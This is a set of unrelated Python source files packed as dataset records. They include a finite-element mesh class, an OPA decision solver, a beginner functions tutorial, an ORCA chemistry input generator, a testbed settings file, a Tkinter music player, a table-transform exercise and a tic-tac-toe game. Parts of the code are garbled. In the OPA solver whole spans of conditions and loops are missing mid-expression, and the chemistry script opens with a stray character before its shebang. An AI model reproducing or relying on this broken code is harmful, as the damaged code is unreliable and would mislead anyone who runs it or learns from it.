Element.elementType = 'kTet10'\n Element.total_node = 10\n Element.total_corner_node = 4\n Element.connectivity = connectivity[0:4] + [0] + connectivity[4:10] + [0] * 9\n elif len(connectivity) == 8: # Linear brick element: kHex8\n Element.elementType = 'kHex8'\n Element.total_node = 8\n Element.total_corner_node = 8\n Element.connectivity = connectivity + [0] * 12\n elif len(connectivity) == 20: # Quadratic brick element: kHex20\n Element.elementType = 'kHex20'\n Element.total_node = 20\n Element.total_corner_node = 8\n Element.connectivity = connectivity\n else:\n utilities.element3DTypeWrongMessage()\n raise EOFError\n self.Element.append(Element)\n\n # set material id for each element\n for i in range(self.nmate):\n element_ids = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.MeshRegionById(self.Material[i].body_id).ElementIds\n for element_id in element_ids:\n self.Element[element_id-1].material_id = i + 1\n\n def setOmega(self, ExtAPI):\n '''\n ================================================================\n Homogenized SG volume calculation\n ---------------------------------\n Solid model (3D structural model): Volume of the homogenized material\n including both the volume of the material and the volume of possible\n voids in the SG.\n 1D SG: Length\n 2D SG: Area\n 3D SG: Volume\n ---------------------------------\n Plate/shell model\n 1D SG: 1.0\n 2D SG: Length along y2\n 3D SG: Area spanned by y1 and y2\n ---------------------------------\n Beam model\n 2D SG: 1.0\n 3D SG: Length along y1\n ================================================================\n '''\n node_x = [x.coordinate[0] for x in self.Node]\n node_y = [y.coordinate[1] for y in self.Node]\n node_z = [z.coordinate[2] for z in self.Node]\n\n len_x = max(node_x) - min(node_x)\n len_y = max(node_y) - min(node_y)\n len_z = max(node_z) - min(node_z)\n\n if self.SolidModel: # solid model\n if self.nSG == 1:\n self.omega = len_x\n elif self.nSG == 2:\n self.omega = len_y * len_z\n elif self.nSG == 3:\n self.omega = len_x * len_y * len_z\n elif self.PlateModel: # plate/shell model\n if self.nSG == 1:\n self.omega = 1.0\n elif self.nSG == 2:\n self.omega = len_y\n elif self.nSG == 3:\n self.omega = len_x * len_y\n elif self.BeamModel: # beam model\n if self.nSG == 1:\n pass # error\n elif self.nSG == 2:\n self.omega = 1.0\n elif self.nSG == 3:\n self.omega = len_x\n\n\nclass BeamModel:\n '''BeamModel class\n attributes: submodel, beam_ini_curvatures, beam_ini_oblique\n '''\n def __init__(self):\n self.submodel = 0\n self.beam_ini_curvatures = []\n self.beam_ini_oblique = []\n\n def setBeamModel(self, submodel, beam_ini_curvatures, beam_ini_oblique):\n beamModelName = {'Euler-Bernoulli Beam Model': 0, 'Timoshenko Beam Model': 1,\n 'Vlasov Beam Model': 2, 'Beam Model With the Trapeze Effect': 3}\n self.submodel = beamModelName[submodel]\n self.beam_ini_curvatures = beam_ini_curvatures\n self.beam_ini_oblique = beam_ini_oblique\n\n\nclass PlateModel:\n '''PlateModel class\n attributes: submodel, plate_ini_curvatures\n '''\n def __init__(self):\n self.submodel = 0\n self.plate_ini_curvatures = []\n\n def setPlateModel(self, submodel, plate_ini_curvatures):\n plateModelName = {'Kirchhoff-Love Model': 0, 'Reissner-Mindlin Model': 1}\n self.submodel = plateModelName[submodel]\n self.plate_ini_curvatures = plate_ini_curvatures\n\n\nclass SolidModel:\n def __init__(self):\n pass\n","repo_name":"banghuazhao/ANSYS_Workbench-SwiftComp_GUI","sub_path":"src/SwiftComp/sg.py","file_name":"sg.py","file_ext":"py","file_size_in_byte":34229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"34776982433","text":"from matplotlib import pyplot\r\nfrom pulp import LpMaximize, LpProblem, LpStatus, lpSum, LpVariable,GLPK\r\n\r\nclass OPASolver:\r\n experts=[] # experts=[{\"name\"=\"Alami\",\"rank\"=1,weight=0.235},{\"name\":\"Salami\",\"rank\":2,weight:0.134},...]\r\n criterias=[] # criterias=[{\"name\"=\"price\",\"rank\"=1,weight=0.4},{\"name\":\"power\",\"rank\":2,weight:0.121},...]\r\n alternatives=[] # alternatives=[{\"name\"=\"Renault\",\"rank\"=1,weight=0.564},{\"name\":\"Fiat\",\"rank\":2,weight:0.215},...]\r\n expertsCriterias=[] # expertsCriterias=[{\"expert\":\"Alami\",\"criterias\":[{\"name\":\"power\",\"rank\":1},{\"name\":\"price\",\"rank\":2}]},{\"expert\":\"Salami\",\"criterias\":[{\"name\"=\"power\",\"rank\"=1},{\"name\"=\"price\",\"rank\"=2}]},...]\r\n preferenceDegreeExpert=1\r\n preferenceDegreeCriteria=1\r\n preferenceDegreeAlternative=1\r\n model=LpProblem(name=\"OPA\", sense=LpMaximize)\r\n expertsCriteriasAlternatives=[]\r\n def __init__(self,e=[],c=[],a=[],ec=[],eca=[]):\r\n self.experts=e\r\n self.criterias=c\r\n self.alternatives=a\r\n self.expertsCriterias=ec\r\n self.expertsCriteriasAlternatives=eca\r\n self.model = LpProblem(name=\"OPA\", sense=LpMaximize)\r\n #__________________________ Degree of preference __________________\r\n def setPreferenceDegreeExpert(self,d=1):\r\n self.preferenceDegreeExpert=d;\r\n def setPreferenceDegreeCriteria(self,d=1):\r\n self.preferenceDegreeCriteria=d;\r\n def setPreferenceDegreeAlternative(self,d=1):\r\n self.preferenceDegreeAlternative=d;\r\n \r\n def getPreferenceDegreeExpert(self,d=1):\r\n return self.preferenceDegreeExpert;\r\n def getPreferenceDegreeCriteria(self,d=1):\r\n return self.preferenceDegreeCriteria;\r\n def getPreferenceDegreeAlternative(self,d=1):\r\n return self.preferenceDegreeAlternative;\r\n #_______________________________Builders_____________________\r\n def addExpert(self,name,rank):\r\n for expert in self.experts:\r\n if(expert[\"name\"]==name):\r\n print(\"This expert already exists !!\")\r\n return \r\n self.experts.append({\"name\":name,\"rank\":rank})\r\n def addCriteria(self,name,rank=0):\r\n for criteria in self.criterias:\r\n if(criteria[\"name\"]==name):\r\n print(\"This criteria already exists !!\")\r\n return \r\n self.criterias.append({\"name\":name,\"rank\":rank})\r\n def addAlernative(self,name):\r\n for alternative in self.alternatives:\r\n if(alternative[\"name\"]==name):\r\n print(\"This alternative already exists !!\")\r\n return \r\n self.alternatives.append({\"name\":name})\r\n #________________________________________________________________\r\n def setCriteriaRanks(self):\r\n for i in range (len(self.criterias)):\r\n rank=len(self.criterias)\r\n for j in range(len(self.criterias)):\r\n if(self.criterias[j][\"weight\"] -1):\r\n lenght=len(self.expertsCriterias[j][\"criterias\"])\r\n if(lenght==0) : \r\n self.expertsCriterias[j][\"criterias\"]=[{\"criteria\":criteria,\"rank\":rank}]\r\n else : \r\n c=0\r\n while(c -1 ) and (c>-1)): \r\n lenght=len(self.expertsCriteriasAlternatives[j][\"criterias\"][c][\"alternatives\"]) \r\n a=0\r\n while(a=z\r\n else: \r\n self.model += coefficients[i]*(weights[i]-weights[i+1])>=z\r\n self.model += sum([weights[i] for i in range(dim)])==1\r\n \r\n \r\n # Add the objective function to the model\r\n self.model += lpSum([z, z])\r\n status = self.model.solve()\r\n liste= self.model.variables()\r\n w=0;\r\n for i in range(len(self.experts)):\r\n self.experts[i][\"weight\"]=0\r\n for i in range(len(self.criterias)):\r\n self.criterias[i][\"weight\"]=0\r\n for i in range(len(self.alternatives)):\r\n self.alternatives[i][\"weight\"]=0\r\n\r\n for i in range(len(self.expertsCriteriasAlternatives)):\r\n c=len(self.expertsCriteriasAlternatives[i][\"criterias\"])\r\n self.expertsCriteriasAlternatives[i][\"weight\"]=0\r\n expertName=self.expertsCriteriasAlternatives[i][\"expert\"]\r\n index=self.indiceExpert(expertName)\r\n self.experts[index][\"weight\"]=0\r\n for j in range(c):\r\n a=len(self.expertsCriteriasAlternatives[i][\"criterias\"][j][\"alternatives\"]);\r\n criteriaIndex=self.indiceCriteria(self.expertsCriteriasAlternatives[i][\"criterias\"][j][\"criteria\"])\r\n for k in range(a):\r\n self.expertsCriteriasAlternatives[i][\"criterias\"][j][\"alternatives\"][k][\"weight\"]=liste[w].value()\r\n print(liste[w].name,\" = \",liste[w].value())\r\n alternativeIndex=self.indiceAlternative(self.expertsCriteriasAlternatives[i][\"criterias\"][j][\"alternatives\"][k][\"alternative\"])\r\n self.expertsCriteriasAlternatives[i][\"weight\"]+=liste[w].value()\r\n self.experts[index][\"weight\"]+=liste[w].value()\r\n self.criterias[criteriaIndex][\"weight\"]+=liste[w].value()\r\n self.alternatives[alternativeIndex][\"weight\"]+=liste[w].value()\r\n w=w+1;\r\n self.setCriteriaRanks()\r\n self.setAlternativeRanks()\r\n return liste \r\n#---------------------------------------------------------------------------------------\r\n #______________________ getters and setters ______________________ \r\n def getExperts(self):\r\n return self.experts\r\n def getCriterias(self):\r\n return self.criterias\r\n def getAlternatives(self):\r\n return self.alternatives\r\n #________________________ OPA output weights _____________________\r\n def getExpertsWeights(self):\r\n dics={}\r\n for expert in self.experts:\r\n if (\"weight\" not in expert):\r\n print(\"the experts weights are not yet calculated !!\")\r\n return {}\r\n else : dics[expert[\"name\"]]=expert[\"weight\"]\r\n return dics\r\n def getCriteriasWeights(self):\r\n dics={}\r\n for criteria in self.criterias:\r\n if (criteria['weight']==0):\r\n print(\"the criterias weights are not yet calculated !!\")\r\n return {}\r\n else : dics[criteria[\"name\"]]=criteria[\"weight\"]\r\n return dics\r\n def getAlternativesWeights(self):\r\n dics={}\r\n for alternative in self.alternatives:\r\n if (alternative['weight']==0):\r\n print(\"the alternatives weights are not yet calculated !!\")\r\n return {}\r\n else : dics[alternative[\"name\"]]=alternative[\"weight\"]\r\n return dics\r\n #_________________ graphic drawing _________\r\n def drawExpertWeights(self):\r\n dics=self.getExpertsWeights()\r\n self.drawWeights(dics,\"#5C9AD6\",\"Experts\")\r\n def drawCriteriasWeights(self):\r\n dics=self.getCriteriasWeights()\r\n pyplot.bar(list(dics.keys()),dics.values())\r\n self.drawWeights(dics,\"#FCC000\",\"Criterias\")\r\n def drawAlternativesWeights(self):\r\n dics=self.getAlternativesWeights()\r\n self.drawWeights(dics,\"#ED7D31\",\"Alternatives\")\r\n \r\n def drawWeights(self,dics,color,param=\"\"):\r\n pyplot.bar(list(dics.keys()),dics.values(),color =color,\r\n width = 0.8)\r\n pyplot.grid(color='#95a5a6', linestyle=':', linewidth=0.5, axis='y')\r\n pyplot.xlabel(param)\r\n pyplot.ylabel('Weights')\r\n pyplot.title('weights of '+param)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"abendarag/-ElsevierSoftwareX-","sub_path":"OPASolver.py","file_name":"OPASolver.py","file_ext":"py","file_size_in_byte":12861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33405012398","text":"#Function - code you want to use repeatedly\n\n#def my function():\n# Do This\n# Then Do This\n# Finally Do This\n\n#Function with inputs\n#def my function(something):\n# Do This With something\n# Then Do This\n# Finally Do This\n\n#Functions with Outputs\n#def my function():\n# Do This With something\n# Then Do This\n# Finally Do This\n\n#return tells function that it is the end\n\ndef format_name1(f_name, l_name):\n if f_name == \"\" or l_name == \"\":\n return \"You didn't provide valid inputs.\"\n formated_f_name = f_name.title()\n formated_l_name = l_name.title()\n return f\"Result: {formated_f_name} {formated_l_name}\\n\"\n\n\n#Storing output in a variable\nformatted_name = format_name1(input(\"Your first name: \"), input(\"Your last name: \"))\nprint(formatted_name)\n#or printing output directly\nprint(format_name1(input(\"What is your first name? \"), input(\"What is your last name? \")))\n\n#Return as an early exit\ndef format_name2(f_name, l_name):\n # Below is a docstring that will appear as function description\n \"\"\"Take a first and last name and format it\n to return the title case version of the name.\"\"\"\n if f_name == \"\" or l_name == \"\":\n #early return\n return \"You didn't provide valid inputs.\"\n formated_f_name = f_name.title()\n formated_l_name = l_name.title()\n return f\"Result: {formated_f_name} {formated_l_name}\\n\"\n\n#Storing output in a variable\nformatted_name = format_name2(input(\"Your first name: \"), input(\"Your last name: \"))\nprint(formatted_name)\n#or printing output directly\nprint(format_name2(input(\"What is your first name? \"), input(\"What is your last name? \")))\n\n#Already used functions with outputs.\noutput = len(\"Javier Soto\")\nprint(f\"Length of output = {output}.\")\n\nformat_name2()","repo_name":"jsoto3000/angela-yu-100-days-python","sub_path":"day-010/functions-with-outputs.py","file_name":"functions-with-outputs.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35690977181","text":"i#!/usr/bin/python3\n\nimport os\nfrom numpy import *\nimport copy\nimport sys\nimport itertools\nfrom pathlib import Path\n\n\nclass Atom:\n def __init__(self,x,y,z,name,element):\n self.name = name\n self.element = element\n self.x = array([x,y,z])\n\nsystem = []\nsystem.append(Atom(-3,0,0,\"He\",\"He\"))\nsystem.append(Atom(0,3,0,\"He\",\"He\"))\nsystem.append(Atom(0,-3,0,\"He\",\"He\"))\nsystem.append(Atom(0,0,3,\"He\",\"He\"))\nsystem.append(Atom(0,0,-3,\"He\",\"He\"))\nsystem.append(Atom(0,0,0,\"He\",\"He\"))\nsystem.append(Atom(12345,0,0,\"He\",\"He\"))\n\n\nfor size in range(1,len(system)):\n for i, combination in enumerate(itertools.combinations(range(len(system)),size)):\n name = str(size) + \"/\" + str(i)\n Path(\"outputFiles/{}\".format(name)).mkdir(parents=True, exist_ok=True)\n fileName = \"outputFiles/{}/input.inp\".format(name)\n with open(fileName, \"w\") as f:\n f.write(\"! CCSD(T) verytightscf aug-cc-pvtz NoAutoStart\\n\\n\")\n f.write(\"%mdci\\n\")\n f.write(\"MaxIter 100\\n\")\n f.write(\"STol 1e-6\\n\")\n f.write(\"end\\n\\n\")\n f.write(\"%pal\\n\")\n f.write(\"nprocs {}\\n\".format(size))\n f.write(\"end\\n\\n\")\n f.write(\"%MaxCore 5000\\n\")\n f.write(\"\\n\\n\")\n f.write(\"*xyz 0 1\\n\")\n for j, atom in enumerate(system):\n if j in combination:\n f.write(\"{} {} {} {}\\n\".format(system[j].element,system[j].x[0],system[j].x[1],system[j].x[2]))\n else:\n f.write(\"{} : {} {} {}\\n\".format(system[j].element,system[j].x[0],system[j].x[1],system[j].x[2]))\n f.write(\"*\\n\")\n f.write(\"$new_job\")\n f.write(\"\\n\")\n f.write(\"! CCSD(T) verytightscf aug-cc-pvqz NoAutoStart\\n\\n\")\n f.write(\"%mdci\\n\")\n f.write(\"MaxIter 100\\n\")\n f.write(\"STol 1e-6\\n\")\n f.write(\"end\\n\\n\")\n f.write(\"%pal\\n\")\n f.write(\"nprocs {}\\n\".format(size))\n f.write(\"end\\n\\n\")\n f.write(\"%MaxCore 5000\\n\")\n f.write(\"\\n\\n\")\n f.write(\"*xyz 0 1\\n\")\n for j, atom in enumerate(system):\n if j in combination:\n f.write(\"{} {} {} {}\\n\".format(system[j].element,system[j].x[0],system[j].x[1],system[j].x[2]))\n else:\n f.write(\"{} : {} {} {}\\n\".format(system[j].element,system[j].x[0],system[j].x[1],system[j].x[2]))\n f.write(\"*\\n\")\n\n\n","repo_name":"mattkmostrom/Scripting-Fun","sub_path":"tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41494574172","text":"import os\nfrom sys import platform as _platform\n##################################docker config#################################\ndocker_url_linux = \"unix://var/run/docker.sock\"\ndocker_url_other = \"tcp://localhost:4243\"\n\ndocker_url = docker_url_linux if _platform.lower().startswith(\"linux\") else docker_url_other\n\n#mapped_port_in = 80 # for apache\nmapped_port_in = 8888 # for node\nmapped_port_out = 49160\n\nreport_verbosity = \"DEBUG\"\nspoiled_mode = False\nbrowser_visible = False\ntimeout = 5\n################################################################################\n\n###################################file config##################################\n\ncurrent_path = os.path.dirname(os.path.realpath(__file__))\n\n## results default folder\nresults_filename = current_path + \"/reports/TestResults.csv\"\n\n##input dirs\napplications_path = current_path + \"/data/targets/applications/\"\nconfigurations_path = current_path + \"/data/targets/configurations/\"\ncontainers_path = current_path + \"/data/targets/containers/\"\nexploits_path = current_path + \"/data/exploits/\"\n\n################################################################################\n","repo_name":"soulr3aver/TestREx","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30068126577","text":"\"\"\"\r\n\n\nCreate a function that turns a list of words into a comma separated list,\nwhere the last word is separated by the word \"and\".\n\n### Examples\n\n words_to_sentence([\"edabit\"]) ➞ \"edabit\"\n \n words_to_sentence([\"Hello\", \"\", \"Bye\"]) ➞ \"Hello and Bye\"\n \n words_to_sentence([\"Hello\", \"Bye\", \"See you soon\"]) ➞ \"Hello, Bye and See you soon\"\n\n### Notes\n\n`None` values, empty lists or lists with only empty or `None` values should\nreturn an empty string: `\"\"`\n\n\"\"\"\r\n\ndef words_to_sentence(w):\n if not bool(w) or w[0] == \"\":\n return \"\"\n if len(w) == 1:\n return w[0]\n words = [ch for ch in w if len(ch) > 0]\n if 1 < len(words) < 3:\n return \"{} and {}\".format(words[0], words[-1])\n return \"{}, {} and {}\".format(words[0], \", \".join(words[1:-1]), words[-1])\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"GP6CEr9a5CMqPHY7C_12.py","file_name":"GP6CEr9a5CMqPHY7C_12.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18089849785","text":"from tkinter import *\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom pygame import mixer\nimport os\n\nroot = Tk()\n\n#Create Menubar\nmenubar = Menu(root)\nroot.config(menu=menubar)\n\n#Create sub menu\nsubMenu = Menu(menubar, tearoff=0)\ndef browse_file():\n global filename\n filename = filedialog.askopenfilename()\n\nmenubar.add_cascade(label='File', menu=subMenu)\nsubMenu.add_command(label='Open',command=browse_file)\nsubMenu.add_command(label='Exit',command=root.destroy)\n\ndef About_Us():\n messagebox.showinfo('About Music Player','Developer: Nishit Singh \\nContact Me: ns2023@gmail.com')\n\nsubMenu = Menu(menubar, tearoff=0)\nmenubar.add_cascade(label='Help', menu=subMenu)\nsubMenu.add_command(label='About Me', command=About_Us)\n\nmixer.init() #initializing the mixer\n\nroot.geometry('300x350+750+300')\nroot.title(\"Music Player\")\nroot.iconbitmap(r'pics\\music_player.ico')\n\ntext = Label(root,text='MUSIC PLAYER',fg = \"blue\", bg = \"yellow\", font = \"Verdana 20 bold\")\ntext.pack(pady=10)\n\ndef play_music():\n try:\n paused\n except NameError:\n\n try:\n mixer.music.load(filename)\n mixer.music.play()\n statusbar['text']= \"Playing Music\" + '-' + os.path.basename(filename)\n except:\n #tkinter.messagebox.showerror('File Not Found','File Not Found Please import song')\n browse_file()\n else:\n mixer.music.unpause()\n \ndef stop_music():\n filename = None\n mixer.music.stop()\n statusbar['text']= \"Stopped Music\"\n\ndef pause_music():\n global paused\n paused = TRUE\n mixer.music.pause()\n\ndef set_volume(volume):\n volume=int(volume) / 100\n mixer.music.set_volume(volume)\n\ndef rewind_music():\n play_music()\n statusbar['text']= \"Playing Music\" + '-' + os.path.basename(filename)\n\n\n\nmiddleframe = Frame(root)\nmiddleframe.pack(padx=15, pady=15)\n\n#===============================================================================\n\nplayphoto = PhotoImage(file='pics\\play.png')\nplaybtn = Button(middleframe, image=playphoto , command=play_music, width=200, bd=5)\nplaybtn.pack(pady=10)\n\n#===============================================================================\n\nstopphoto = PhotoImage(file='pics\\stop.png')\nstopbtn = Button(middleframe, image=stopphoto, command=stop_music ,bd=5)\nstopbtn.pack(side='left',padx=20, pady=10)\n\n#===============================================================================\n\npausephoto = PhotoImage(file='pics\\pause.png')\npausebtn = Button(middleframe, image=pausephoto, command=pause_music ,bd=5)\npausebtn.pack(side='left',padx=20, pady=10)\n\n#===============================================================================\n\nrewindphoto = PhotoImage(file='pics\\\\rewind-button.png')\nrewindbtn = Button(middleframe, image=rewindphoto, command=rewind_music ,bd=5)\nrewindbtn.pack(side='left',padx=20, pady=10)\n\n#===============================================================================\n\nscale = Scale(root, from_=0,to=100,orient=HORIZONTAL, command=set_volume, length=200, bd=5)\nscale.set(0.01)\nmixer.music.set_volume(0.01)\nscale.pack(pady=15)\n\n#===============================================================================\n\nstatusbar = Label(root, text='Welcome To Music Player', relief=SUNKEN)\nstatusbar.pack(side='bottom', fill=X)\n\n#===============================================================================\n\nroot.mainloop() #this helps countinously show windows\n","repo_name":"NishitSingh2023/MusicPlayer","sub_path":"MusicPlayer.py","file_name":"MusicPlayer.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29395145064","text":"from pprint import pprint\n\n\ndef transpose(table):\n response = []\n for i in range(len(table[0])):\n response.append([])\n for j in range(len(table)):\n response[i].append(table[j][i])\n return response\n\n\ndef delete_empty_rows(table):\n return [row for row in table if row[0] is not None]\n\n\ndef delete_duplicate_rows(table):\n added = set()\n new_arr = []\n for i in table:\n if i[1] not in added:\n new_arr.append(i)\n added.add(i[1])\n return new_arr\n\n\ndef transformer(i, value):\n if i == 0:\n return \"Выполнено\" if value == '1' else \"Не выполнено\"\n if i == 3:\n replaced = value.replace('+7', '')\n return replaced[0:5] + \" \" + replaced[5:]\n\n\ndef transform(table):\n for i in range(len(table)):\n for j in range(len(table[i])):\n if i == 2:\n continue\n if i == 1:\n nt = table[i][j].split(\"&\")\n table[i][j] = nt[1].replace('@', '[at]')\n table[i+1][j] = \"%.4f\" % float(nt[0])\n else:\n table[i][j] = transformer(i, table[i][j])\n return table\n\n\ndef main(table):\n return transform(\n transpose(\n delete_duplicate_rows(\n delete_empty_rows(table))\n )\n )\n\n\nif __name__ == \"__main__\":\n pprint(main([['0', '0.5&vanukev58@mail.ru', '0', '+7(383)519-07-93'],\n ['0', '0.4&lorberg91@mail.ru', '0', '+7(750)715-50-78'],\n ['1', '0.8&samomanz67@rambler.ru', '1', '+7(978)710-52-97'],\n ['1', '0.1&zimifev36@rambler.ru', '1', '+7(558)309-64-82'],\n [None, None, None, None],\n [None, None, None, None],\n ['1', '0.1&zimifev36@rambler.ru', '1', '+7(558)309-64-82'],\n ['1', '0.1&zimifev36@rambler.ru', '1', '+7(558)309-64-82']]))\n","repo_name":"Skadar7/Python","sub_path":"KisPython/task10.py","file_name":"task10.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42241223927","text":"\r\n\r\n\r\ndef younger_person ():\r\n ages = [72,42,32,50,56,14,78,30,51,89,12,38,67,10]\r\n\r\n solution = ages[0]\r\n for age in ages:\r\n if age < solution:\r\n solution = age\r\n\r\n print(solution)\r\n\r\n\r\ndef statistics():\r\n data = [12,-1,123,345,412,4.55,123,23.4,123,4587,-129,94,956,14565,32, 0.001, 123]\r\n\r\n count = 0\r\n total = 0\r\n over_500 = 0\r\n\r\n for num in data:\r\n count += 1\r\n total += num\r\n\r\n if num < 0:\r\n negative = negative + 1\r\n\r\n if(num > 500):\r\n over_500 += 1\r\n\r\n \r\n print(f\"2 solution is: {total}\")\r\n print(f\"1 solution is: {len(data)}\")\r\n\r\ndef print_some_nums():\r\n #print the multiples of 10 that exist between 10 and 100\r\n\r\n for num in range(1, 11):\r\n print(num * 10)\r\n \r\n for x in range(10, 110, 10):\r\n print(x)\r\n\r\n\r\n\r\nprint(\"Test test test\")\r\nyounger_person()\r\nstatistics()\r\nprint_some_nums()","repo_name":"durruita/backendv2","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31086684498","text":"import tkinter as tk\nimport tkinter as ttk\n# from tkinter import font as tkfont\nfrom PIL import Image, ImageTk\nimport random\nimport copy\nimport math\n\n# 定数\n\nfirst_col = \"#EE4444\"\nfirst_col_light = \"#EE9999\"\nsecond_col = \"#4444EE\"\nsecond_col_light = \"#9999EE\"\n\nC_DELAY = 400\n\n\n# ユーティリティ {{{\n\ndef from_rgb(col):\n return \"#%02x%02x%02x\" % col\n\n\ndef random_color():\n return (\n random.randrange(256),\n random.randrange(256),\n random.randrange(256)\n )\n\n\ndef my_polygon(canvas, pos, pos_list, *args, rotate=0, **kwargs):\n n = len(pos_list)\n\n pos_list = copy.deepcopy(pos_list)\n\n pos_list = list(map(lambda el: (\n pos[0] + (el[0] * math.cos(rotate) - el[1] * math.sin(rotate)),\n pos[1] + (el[0] * math.sin(rotate) + el[1] * math.cos(rotate))\n ), pos_list))\n for i in range(n):\n canvas.create_line(pos_list[i], pos_list[(i + 1) % n], *args, **kwargs)\n\n\ndef writePlayer(canvas, who, x, y, *, small=False):\n names = [\"first\", \"second\"]\n marks = [\"o\", \"x\"]\n cols = [first_col, second_col]\n if small:\n canvas.create_text(\n x, y,\n text=names[who], font=(\"Molot\", 18))\n canvas.create_text(\n x + 45 if who == 0 else x + 53, y-2,\n text=marks[who], fill=cols[who], font=(\"Molot\", 24))\n else:\n canvas.create_text(\n x, y,\n text=names[who], font=(\"Molot\", 26))\n canvas.create_text(\n x + 65 if who == 0 else x + 77, y,\n text=marks[who], fill=cols[who], font=(\"Molot\", 35))\n\n# }}}\n\n\n# クラス {{{\n\nclass Game:\n def __init__(self):\n self.board = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n\n def get(self, i, j):\n assert(0 <= i < 3)\n assert(0 <= j < 3)\n return self.board[i][j]\n\n def set(self, i, j, k):\n assert(0 <= i < 3)\n assert(0 <= j < 3)\n assert(0 <= k <= 2)\n self.board[i][j] = k\n return self.check()\n\n def check(self):\n board = self.board\n for i in range(3):\n if board[i][0] == board[i][1] == board[i][2] != 0:\n return board[i][0]\n for i in range(3):\n if board[0][i] == board[1][i] == board[2][i] != 0:\n return board[0][i]\n if board[0][0] == board[1][1] == board[2][2] != 0:\n return board[0][0]\n if board[0][2] == board[1][1] == board[2][0] != 0:\n return board[0][2]\n if self.countNonZero() == 9:\n return -1\n return 0\n\n def countNonZero(self):\n cnt = 0\n for i in range(3):\n for j in range(3):\n if self.board[i][j]:\n cnt += 1\n return cnt\n\n # こういうのはデバッグ用に残しておく\n def output(self):\n print(\"-------\")\n for i in range(3):\n print(\"|\", end=\"\")\n for j in range(3):\n if self.get(i, j) == 0:\n print(\" \", end=\"\")\n elif self.get(i, j) == 1:\n print(\"o\", end=\"\")\n elif self.get(i, j) == 2:\n print(\"x\", end=\"\")\n print(\"|\", end=\"\")\n print()\n print(\"-------\")\n\n def outputWithNumber(self):\n num = 1\n fromNum = []\n print()\n print(\"-------\")\n for i in range(3):\n print(\"|\", end=\"\")\n for j in range(3):\n if game.get(i, j) == 0:\n print(num, end=\"\")\n num += 1\n fromNum.append((i, j))\n elif game.get(i, j) == 1:\n print(\"o\", end=\"\")\n elif game.get(i, j) == 2:\n print(\"x\", end=\"\")\n print(\"|\", end=\"\")\n print()\n print(\"-------\")\n return fromNum\n\n def __hash__(self):\n hs = 0\n for i in range(3):\n for j in range(3):\n hs += self.board[i][j] * (3 ** (i * 3 + j))\n return hs\n\n\nclass GameAI:\n def __init__(self, func, name):\n self.func = func\n self.name = name\n\n def think(self, me, game: Game):\n return self.func(me, game)\n\n\ngame = Game()\n\n\ndef think1(me, game):\n while(True):\n select = (random.randrange(3), random.randrange(3))\n if game.get(select[0], select[1]) == 0:\n return select\n\n# }}}\n\n\n# 計算 {{{\n\n# メモ化再帰 : 本質的な計算量改善\n\nmemo = {}\n\n\ndef think_dfs(me, you, game):\n if hash(game) in memo:\n return memo[hash(game)]\n if game.check() != 0:\n memo[hash(game)] = (game.check(), [])\n return memo[hash(game)]\n\n canWin = []\n canReachDraw = []\n some = []\n\n for i in range(3):\n for j in range(3):\n if game.get(i, j) == 0:\n game2 = copy.deepcopy(game)\n game2.set(i, j, me)\n winner = think_dfs(you, me, game2)[0]\n if me == winner:\n canWin.append((i, j))\n if winner == -1:\n canReachDraw.append((i, j))\n some.append((i, j))\n if canWin:\n memo[hash(game)] = (me, canWin)\n elif canReachDraw:\n memo[hash(game)] = (-1, canReachDraw)\n else:\n memo[hash(game)] = (you, some)\n return memo[hash(game)]\n\n\n# メモを予め埋めておく\nthink_dfs(1, 2, Game())\nthink_dfs(2, 1, Game())\n\n\ndef think2(me, game):\n if random.randrange(9) < 3:\n return think3(me, game)\n else:\n return think1(me, game)\n\n\ndef think3(me, game, *, noResign=False):\n (winner, candi) = think_dfs(me, 3 - me, copy.deepcopy(game))\n if winner == 3 - me and not noResign:\n return None\n assert(len(candi) != 0)\n return random.choice(candi)\n\n\n# }}}\n\n\n# アプリメイン {{{\n\nclass TicTacToe(tk.Tk):\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n\n self.width = 500\n self.height = 500\n\n self.title(\"Tic Tac Toe\")\n self.geometry(f\"{self.width}x{self.height}\")\n\n # メインのフレーム\n container = ttk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n\n # grid_[row/column]configure(index, ...)\n # これは, weightによる重み付けを行ったグリッド表示をする\n # https://effbot.org/tkinterbook/grid.htm#Tkinter.Grid.grid_rowconfigure-method\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n pages = [TitleScene, LevelSelect, Main] # TODO\n self.frames = {}\n for page in pages:\n page_name = page.__name__\n frame = page(parent=container, controller=self)\n self.frames[page_name] = frame\n\n # グリッドマネージャーにより, フレームを中央に置く\n # https://effbot.org/tkinterbook/grid.htm\n frame.grid(row=0, column=0, sticky=\"nsew\")\n # nsew と指定することで中央寄せができる\n\n self.raise_frame(\"TitleScene\")\n\n def raise_frame(self, page_name):\n assert(page_name in self.frames.keys())\n\n # フレームの重なりを一番上に持ってくるようなことをする\n # tkraise : 